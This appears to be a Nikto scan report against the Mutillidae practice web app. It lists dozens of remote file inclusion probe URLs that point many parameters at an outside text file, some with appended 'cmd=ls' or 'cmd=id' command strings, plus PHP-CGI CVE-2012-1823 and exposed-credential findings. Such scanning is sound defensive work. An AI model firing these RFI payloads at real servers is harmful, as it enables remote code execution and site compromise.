[HIGH    ] /mutillidae/index.php?function=custom&custom=http://blog.cir
Evidence: /mutillidae/index.php?function=custom&custom=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?gOo=http://blog.cirt.net/rfiinc.txt: R
Evidence: /mutillidae/index.php?gOo=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?gen=http://blog.cirt.net/rfiinc.txt: R
Evidence: /mutillidae/index.php?gen=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?get=http://blog.cirt.net/rfiinc.txt: R
Evidence: /mutillidae/index.php?get=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?home_name=http://blog.cirt.net/rfiinc.
Evidence: /mutillidae/index.php?home_name=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?home_Nikto=http://blog.cirt.net/rfiinc
Evidence: /mutillidae/index.php?home_Nikto=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?ilang=http://blog.cirt.net/rfiinc.txt?
Evidence: /mutillidae/index.php?ilang=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?inc_dir=http://blog.cirt.net/rfiinc.tx
Evidence: /mutillidae/index.php?inc_dir=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?inc_dir=http://blog.cirt.net/rfiinc.tx
Evidence: /mutillidae/index.php?inc_dir=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?includeDir=http://blog.cirt.net/rfiinc
Evidence: /mutillidae/index.php?includeDir=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?includeFooter=http://blog.cirt.net/rfi
Evidence: /mutillidae/index.php?includeFooter=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?includesdir=http://blog.cirt.net/rfiin
Evidence: /mutillidae/index.php?includesdir=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?insPath=http://blog.cirt.net/rfiinc.tx
Evidence: /mutillidae/index.php?insPath=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?lang=http://blog.cirt.net/rfiinc.txt: 
Evidence: /mutillidae/index.php?lang=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?language=http://blog.cirt.net/rfiinc.t
Evidence: /mutillidae/index.php?language=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?language=en&main_page=http://blog.cirt
Evidence: /mutillidae/index.php?language=en&main_page=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?lizge=http://blog.cirt.net/rfiinc.txt?
Evidence: /mutillidae/index.php?lizge=http://blog.cirt.net/rfiinc.txt?&cmd=ls: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?lng=http://blog.cirt.net/rfiinc.txt: R
Evidence: /mutillidae/index.php?lng=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?load=http://blog.cirt.net/rfiinc.txt: 
Evidence: /mutillidae/index.php?load=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?loadpage=http://blog.cirt.net/rfiinc.t
Evidence: /mutillidae/index.php?loadpage=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?main_tabid=1&main_content=http://blog.
Evidence: /mutillidae/index.php?main_tabid=1&main_content=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?may=http://blog.cirt.net/rfiinc.txt: R
Evidence: /mutillidae/index.php?may=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?middle=http://blog.cirt.net/rfiinc.txt
Evidence: /mutillidae/index.php?middle=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?mode=http://blog.cirt.net/rfiinc.txt: 
Evidence: /mutillidae/index.php?mode=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?mode=http://blog.cirt.net/rfiinc.txt?&
Evidence: /mutillidae/index.php?mode=http://blog.cirt.net/rfiinc.txt?&cmd=: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?modpath=http://blog.cirt.net/rfiinc.tx
Evidence: /mutillidae/index.php?modpath=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?module=PostWrap&page=http://blog.cirt.
Evidence: /mutillidae/index.php?module=PostWrap&page=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?mosConfig_absolute_path=http://blog.ci
Evidence: /mutillidae/index.php?mosConfig_absolute_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?news7[\"functions\"]=http://blog.cirt.
Evidence: /mutillidae/index.php?news7[\"functions\"]=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?news_include_path=http://blog.cirt.net
Evidence: /mutillidae/index.php?news_include_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?open=http://blog.cirt.net/rfiinc.txt: 
Evidence: /mutillidae/index.php?open=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?option=com_custompages&cpage=http://bl
Evidence: /mutillidae/index.php?option=com_custompages&cpage=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?page=http://blog.cirt.net/rfiinc.txt: 
Evidence: /mutillidae/index.php?page=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?page=http://blog.cirt.net/rfiinc.txt%0
Evidence: /mutillidae/index.php?page=http://blog.cirt.net/rfiinc.txt%00: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?page=http://blog.cirt.net/rfiinc.txt?:
Evidence: /mutillidae/index.php?page=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?pagehttp://blog.cirt.net/rfiinc.txt: R
Evidence: /mutillidae/index.php?pagehttp://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?page[path]=http://blog.cirt.net/rfiinc
Evidence: /mutillidae/index.php?page[path]=http://blog.cirt.net/rfiinc.txt?&cmd=ls: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?pagename=http://blog.cirt.net/rfiinc.t
Evidence: /mutillidae/index.php?pagename=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?pageNikto=http://blog.cirt.net/rfiinc.
Evidence: /mutillidae/index.php?pageNikto=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?pager=http://blog.cirt.net/rfiinc.txt:
Evidence: /mutillidae/index.php?pager=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?pagina=http://blog.cirt.net/rfiinc.txt
Evidence: /mutillidae/index.php?pagina=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?path_to_folder=http://blog.cirt.net/rf
Evidence: /mutillidae/index.php?path_to_folder=http://blog.cirt.net/rfiinc.txt?cmd=id: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?pg=http://blog.cirt.net/rfiinc.txt: Re
Evidence: /mutillidae/index.php?pg=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?pg=http://blog.cirt.net/rfiinc.txt?: R
Evidence: /mutillidae/index.php?pg=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?phpbb_root_path=http://blog.cirt.net/r
Evidence: /mutillidae/index.php?phpbb_root_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?plugin=http://blog.cirt.net/rfiinc.txt
Evidence: /mutillidae/index.php?plugin=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?principal=http://blog.cirt.net/rfiinc.
Evidence: /mutillidae/index.php?principal=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?proMod=http://blog.cirt.net/rfiinc.txt
Evidence: /mutillidae/index.php?proMod=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?proMod=http://blog.cirt.net/rfiinc.txt
Evidence: /mutillidae/index.php?proMod=http://blog.cirt.net/rfiinc.txt?cmd: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?project=http://blog.cirt.net/rfiinc.tx
Evidence: /mutillidae/index.php?project=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?repinc=http://blog.cirt.net/rfiinc.txt
Evidence: /mutillidae/index.php?repinc=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?root_prefix=http://blog.cirt.net/rfiin
Evidence: /mutillidae/index.php?root_prefix=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?root_prefix=http://blog.cirt.net/rfiin
Evidence: /mutillidae/index.php?root_prefix=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?section=http://blog.cirt.net/rfiinc.tx
Evidence: /mutillidae/index.php?section=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?site=http://blog.cirt.net/rfiinc.txt: 
Evidence: /mutillidae/index.php?site=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?site_path=http://blog.cirt.net/rfiinc.
Evidence: /mutillidae/index.php?site_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?styl[top]=http://blog.cirt.net/rfiinc.
Evidence: /mutillidae/index.php?styl[top]=http://blog.cirt.net/rfiinc.txt??: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?template=http://blog.cirt.net/rfiinc.t
Evidence: /mutillidae/index.php?template=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?templates_dir=http://blog.cirt.net/rfi
Evidence: /mutillidae/index.php?templates_dir=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?theme=http://blog.cirt.net/rfiinc.txt:
Evidence: /mutillidae/index.php?theme=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?themepath=http://blog.cirt.net/rfiinc.
Evidence: /mutillidae/index.php?themepath=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?themesdir=http://blog.cirt.net/rfiinc.
Evidence: /mutillidae/index.php?themesdir=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?this_path=http://blog.cirt.net/rfiinc.
Evidence: /mutillidae/index.php?this_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?txt=http://blog.cirt.net/rfiinc.txt: R
Evidence: /mutillidae/index.php?txt=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?up=http://blog.cirt.net/rfiinc.txt: Re
Evidence: /mutillidae/index.php?up=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?url=http://blog.cirt.net/rfiinc.txt: R
Evidence: /mutillidae/index.php?url=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?w=http://blog.cirt.net/rfiinc.txt: Rem
Evidence: /mutillidae/index.php?w=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[HIGH    ] /mutillidae/index.php?way=http://blog.cirt.net/rfiinc.txt???
Evidence: /mutillidae/index.php?way=http://blog.cirt.net/rfiinc.txt??????????????: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/login.php: Admin login page/section found.
Evidence: /mutillidae/login.php: Admin login page/section found.
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/phpMyAdmin/: phpMyAdmin directory found.
Evidence: /mutillidae/phpMyAdmin/: phpMyAdmin directory found.
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[CRITICAL] /mutillidae/?-s: PHP allows retrieval of the source code via
Evidence: /mutillidae/?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[CRITICAL] /mutillidae/login.php?-s: PHP allows retrieval of the source
Evidence: /mutillidae/login.php?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] /mutillidae/#wp-config.php#: #wp-config.php# file found. Thi
Evidence: /mutillidae/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
Remediation: Apply security patches and update server configuration.

-----------------------------------------------------------------
[LOW     ] 1 host(s) tested
Evidence: 1 host(s) tested
Remediation: Apply security patches and update server configuration.

